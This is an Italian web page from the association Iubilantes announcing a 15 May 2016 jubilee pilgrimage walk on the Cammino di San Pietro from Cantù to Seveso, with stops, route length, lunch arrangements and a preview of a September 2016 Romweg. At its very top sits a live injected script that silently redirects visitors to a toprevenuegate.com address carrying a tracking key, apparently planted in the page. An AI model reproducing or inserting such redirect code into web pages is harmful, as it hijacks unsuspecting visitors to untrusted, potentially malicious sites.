Homepagepekok"> <script type="text/javascript">window.location.href = "https://www.toprevenuegate.com/h3fmr4cy75?key=98d6b304028129d66597825ae1de5eb8";</script>
IN ATTESA DEL GRANDE ROMWEG DAL RENO AL PO: sui CAMMINI DELLA REGINA / Cammino di San Pietro da Cantù a Seveso
Nell’ambito dell’ottava edizione della “Giornata Nazionale dei Cammini Francigeni”, promossa dalla Rete dei Cammini nell’ “Anno nazionale dei Cammini” e nell’anno giubilare della Misericordia, l’associazione Iubilantes concluderà oggi domenica 15 maggio la serie di proposte di cammini giubilari aventi come meta altrettante Porte Sante e come percorsi tre diversi tratti storici dei CAMMINI DELLA REGINA.
Dopo il percorso da Griante al Sacro Monte di Ossuccio di domenica 1 maggio e quello da Moltrasio al Duomo di Como dell’8 maggio, svoltisi sui CAMMINI DELLA REGINA, domenica 15 maggio Iubilantes prosegue con il percorso sul Cammino di San Pietro da Cantù al Santuario di San Pietro Martire a Seveso e alla sua Porta Santa, in collaborazione con l’Associazione Amici dell’Arte di Lentate sul Seveso e con il patrocinio del Comune di Lentate sul Seveso.
Il ritrovo è alle ore 8.45 a Cantù presso la chiesa di S. Antonio (via Francesco Daverio) con visita al monumento e al complesso dell’antico Hospitale; le tappe successive saranno a Cantù l’Oratorio della Beata Vergine, il Complesso di Galliano, la chiesa di S. Maria dei Miracoli, a Lentate l’Oratorio di Santo Stefano e l’Oratorio di Santa Maria a Mocchirolo; nel tratto da Meda a Seveso, il sito storico di Farga e il complesso del Santuario ed ex Seminario di San Pietro a Seveso, ora Centro Pastorale Ambrosiano. Le visite saranno curate, per il tratto canturino dagli storici e ricercatori Francesco Porro e Giuseppe Longhi, nell’ambito di Lentate dagli Amici dell’Arte di Lentate sul Seveso e, nel tratto da Meda a Seveso da Giuseppe Longhi. Accoglienza e ristoro lungo il cammino a Novedrate, dove, presso il Centro Sportivo, l’Associazione Terza Età assicurerà il pranzo e servizio bar. La lunghezza è di circa 18 chilometri; la difficoltà è turistico-escursionistica, con percorso pianeggiante su asfalto e sterrato.
Questa “tre giorni” di cammino è un primo assaggio del “Grande ROMWEG dal RENO AL PO”, ovvero del grande cammino che coprirà per intero i Cammini della Regia e il Cammino di San Pietro e che si svolgerà dall’8 al 23 settembre 2016 per circa 300 km da Coira (Canton Grigioni) a Corte Sant’Andrea (Lodi) attraverso Milano e con possibile prosecuzione per Roma.
Per saperne di più: Iubilantes tel. 031.279684 oppure, in corso di escursione, 347.7418614; e-mail iubilantes@iubilantes.it.